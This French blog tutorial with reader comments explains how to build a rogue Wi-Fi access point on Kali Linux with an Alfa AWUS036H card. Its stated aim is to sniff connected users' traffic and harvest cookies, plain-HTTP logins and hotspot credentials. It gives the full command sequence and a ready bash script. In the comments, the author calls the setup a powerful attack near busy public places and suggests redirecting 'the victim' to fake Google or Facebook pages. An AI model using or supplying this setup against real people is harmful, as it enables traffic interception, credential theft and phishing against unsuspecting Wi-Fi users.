Rogue AP avec AWUS036H et Kali Linux

J’ai reçu récemment ma carte Alfa AWUS036H et je voulais voir ce qu’elle avait dans le ventre.

Un Rogue AP (Access Point) permet à des clients de se connecter sur votre carte réseau. Vous pouvez ainsi sniffer leurs paquets (Man In The Middle) et récupérer des données intéressantes (cookies, login et mot de passe de site non-HTTPS, ou code de connexion FreeWifi, SFR Wifi Public, etc.).

Dans ce tuto nous verrons seulement la mise en place d’un point d’accès au web grâce à l’Alfa AWUS036H. La création et l’affichage des pages FreeWifi & co ne sont pas au rendez-vous.

Il vous faut 3 cartes réseau, une pour vous connecter à Internet, la deuxième pour votre Rogue AP et la dernière pour vous connecter sur le Rogue AP.

Il faut tout d’abord installer un serveur DHCP :


apt-get install isc-dhcp-server  # isc-dhcp-server a remplacé dhcp3-server

On édite le fichier /etc/dhcp/dhcpd.conf (vous pouvez modifier les adresse IPs si nécessaire) :

 ddns-update-style interim;

default-lease-time 600;

max-lease-time 7200;

authoritative;

subnet 192.168.1.0 netmask 255.255.255.0 {

  option subnet-mask 255.255.255.0;

  option broadcast-address 198.168.1.255;

  option routers 192.168.1.254;

  option domain-name-servers 8.8.8.8;

  range 192.168.1.1 192.168.1.253;

}

On met la carte émettrice en mode monitor (wlan0 pour moi) :


airmon-ng start wlan0

Si vous obtenez un message semblable à :


Found 3 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

PID         Name

2585      NetworkManager

2997      wpa_supplicant

3005      dhclient

Tuez les processus grâce à leur numéro PID (à adapter dans votre cas) :

kill 2585
kill 2997
kill 3005

On met en route le point d’accès :

airbase-ng -e NomDuRéseau -c 11 -v wlan0

Si vous obtenez un message d’erreur, effectuez ces manipulations :

root@kali:~# airbase-ng -e NomDuRseau -c 11 -v wlan0

ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,

ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make

sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'

Sysfs injection support was not found either.

root@kali:~# airmon-ng stop wlan0

Interface             Chipset                               Driver

wlan0                   Realtek RTL8187L            rtl8187 - [phy0]

(monitor mode disabled)

mon0                    Realtek RTL8187L            rtl8187 - [phy0]

root@kali:~# airmon-ng stop mon0

Interface             Chipset                                Driver

wlan0                   Realtek RTL8187L            rtl8187 - [phy0]

mon0                    Realtek RTL8187L            rtl8187 - [phy0] (removed)

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

PID         Name

2585      NetworkManager

2997      wpa_supplicant

3005      dhclient

Interface             Chipset                               Driver

wlan0                   Realtek RTL8187L            rtl8187 - [phy0]

(monitor mode enabled on mon0)

Airbase-ng a créé une nouvelle interface nommée at0. Il faut l’activer et lui assigner une adresse IP :

ifconfig at0 up
ifconfig at0 192.168.1.254 netmask 255.255.255.0

Créons désormais la route entre votre accès Internet et votre Rogue AP (à adapter dans votre cas) :

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254

On configure le pare-feu :

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

Puis la redirection (utilisez bien votre interface qui est reliée à internet, dans mon cas eth0) :

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

On supprime les baux DHCP existants :

echo > '/var/lib/dhcp/dhcpd.leases'

On lance le serveur DHCP :

dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

Si vous avez un message d’erreur indiquant « ddns-update-style ad_hoc no longer supported », il vous suffit de remplacer la ligne ddns-update-style ad-hoc; par ddns-update-style interim; dans le fichier /etc/dhcp/dhcpd.conf. Relancer la commande précédente.

Activer enfin l’IP forwarding :

echo "1" > /proc/sys/net/ipv4/ip_forward

Connectez-vous sur votre réseau et tentez d’accéder à Internet.

Si ça ne marche pas et que vous êtes un peu limité comme moi… :p

Backtrack/Kali Linux fonctionne-t-il sur une machine virtuelle ? Oui…

Est-ce que vous êtes connecté en WiFi sur votre box grâce à un deuxième adaptateur ? Oui…

Avec quelle carte vous connectez-vous sur le point d’accès ? Le deuxième adaptateur qui n’est du coup plus connecté à Internet :p

Un petit schéma pour être plus clair :

Schéma Rogue AP

Schéma Rogue AP

C’est pour ça qu’il vous faut soit 3 adaptateurs WiFi ou 2 machines. Dans tous les cas, il faut 3 cartes réseau.

Pour effectuer ces opérations, j’ai écrit un script à adapter à votre configuration bien sûr.


#!/bin/bash
VERT="\\033[1;32m"
BLANC="\\033[0;39m"
ROUGE="\\033[1;31m"

error() {
echo -e "$ROUGE""An error occurred during $1"
echo -e "Rogue AP script will stop""$BLANC"
exit 1
}

taskDone() {
echo -e "$VERT""Done""$BLANC"
}

echo -en "Killing NetworkManager... "
pkill NetworkManager
taskDone
echo -en "Killing DHCP... "
pkill dhclient
taskDone
echo -en "Killing wpa_supplicant... "
pkill wpa_supplicant
taskDone
echo -en "Killing Airbase-ng... "
pkill airbase-ng
taskDone

echo -en "Stop mon0... "
airmon-ng stop mon0 >/dev/null 2>&1
taskDone

#Check if isc-dhcp-server is installed
if dpkg -s isc-dhcp-server 2>/dev/null | grep "Status: install ok installed" >/dev/null 2>&1; then
echo -e "isc-dhcp-server is already ""$VERT""installed""$BLANC"
else
echo "isc-dhcp-server install in progress"
if apt-get -y install isc-dhcp-server 1>/dev/null; then
echo -e "isc-dhcp-server installed: ""$VERT""yes""$BLANC"
else
error "the installation of isc-dhcp-server"
fi
fi

#Configure isc-dhcp-server
echo -en "Write /etc/default/isc-dhcp-server... "
cat >/etc/default/isc-dhcp-server <<EOF
INTERFACES="at0"
EOF
taskDone

echo -en "Write /etc/dhcp/dhcpd.conf... "
cat >/etc/dhcp/dhcpd.conf <<EOF
ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 198.168.1.255;
option routers 192.168.1.254;
option domain-name-servers 8.8.8.8;
range 192.168.1.1 192.168.1.253;
}
EOF
taskDone

echo -e "Putting Wlan In Monitor Mode... "
if airmon-ng stop wlan0 1>/dev/null; then # Change to your wlan interface
echo -en "    Wlan0 stop... "
taskDone
if airmon-ng start wlan0 1>/dev/null; then # Change to your wlan interface
echo -en "    Wlan0 start... "
taskDone
else
error "starting wlan0"
fi
else
error "stopping wlan0"
fi

echo -en "Starting Fake AP... "
airbase-ng -e NomDuRéseau -c 11 -v wlan0 >/dev/null 2>&1 & #Change essid, channel and interface
sleep 5;
taskDone

echo -en "Starting at0... "
ifconfig at0 up
ifconfig at0 192.168.1.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
taskDone

echo -en "Configure route... "
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254 # Change IP addresses as configured in your dhcpd.conf
taskDone

echo -en "Configure iptables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface
taskDone

echo -en "Reset DHCP lease..."
echo > '/var/lib/dhcp/dhcpd.leases'
taskDone

echo -en "Start DHCP on at0... "
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 >/dev/null 2>&1 &
sleep 5;
taskDone

echo -en "Activate Ip Forwarding... "
echo "1" > /proc/sys/net/ipv4/ip_forward
taskDone

Ces autres articles devraient aussi vous intéresser :

Publié dans Sécurité
9 commentaires pour “Rogue AP avec AWUS036H et Kali Linux
  1. avatar bibish dit :

    Un peu incomplet sans la fin du tuto sur le rogue AP dommage…
    J’aurais plutôt appelé ce tuto monter un serveur DHCP et faire une redirection sous debian ^^

  2. avatar MF dit :

    Très bon tuto sur la rogue sous isc-dhcp-server.
    Ca a été laborieux pour rétablir la connexion sur Internet vu qu’elle a été coupée avec les « kill » et les arrêts de périphériques. Je ne savais pas comment faire pour me reconnecter à la Box (connexion Internet étant en wifi avec clé WPA sur wlan0 et non en filaire sur eth0). Je ne connais rien en programmation mais j’ai pu bidouiller le script et utiliser ma clé AWUS036NEH. Enfin on peut se connecter directement à Internet via ma box sans que j’ai besoin de donner ma clé WPA. Merci Oyabi.
    Config.:
    PC avec kali + wlan0 Atheros (relié à la Box) + wlan1 AWUS036NEH (rogue AP)

  3. avatar Oyabi dit :

    Merci pour vos retours.
    J’essaierais d’être plus précis dans mes prochains tutos. ;)

  4. avatar Pilume dit :

    J’ai carrément sous-estimé l’attaque rogue-ap . Avec ptit script et tout ya rien à dire tu gères

  5. avatar Oyabi dit :

    Oui, c’est une puissante attaque pour peu que tu sois à côté d’un lieu de passage fréquent.
    Il utilise cette technique dans cette vidéo http://korben.info/100-000-e-en-2-semaines-des-cybercriminels-vous-expliquent.html.
    Si tu améliores le script (demander sur quelle interface choisir au démarrage, etc.), n’hésite pas à me le fournir, je n’ai pas trop le temps en ce moment. ;)

  6. avatar FFOO dit :

    merci pour ce tuto
    est ce que il existe une rogue AP SANS internet, l’esentiel la victime tombe dans la fausse page c’est tout ?
    merci

  7. avatar Oyabi dit :

    Oui bien sûr, il vous suffit de créer une page et de rediriger la victime dessus.
    Vous pouvez aussi créer des fausses pages google/facebook et rediriger la victime lorsqu’elle appelle google.com/facebook.com.

  8. avatar FFOO dit :

    merci pour votre réponse,
    est ce que vous pouvez m’aider pour réaliser rogue AP sans utiliser internet??
    1- activer mode monitor
    2- quel est la configuration du fichier dhcpd?
    3- lancer airbase
    4- quelles sont les commande à exécuter ‘IPtable, dhcp; ifconfig???’

    NB j’ai ma fausse page prête à rediriger dans le répertoire var/www
    merci

  9. avatar Oyabi dit :

    Désolé, je n’ai pas le temps de me pencher dessus pour le moment mais n’hésitez pas à revenir poster votre résultat ici. ;)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>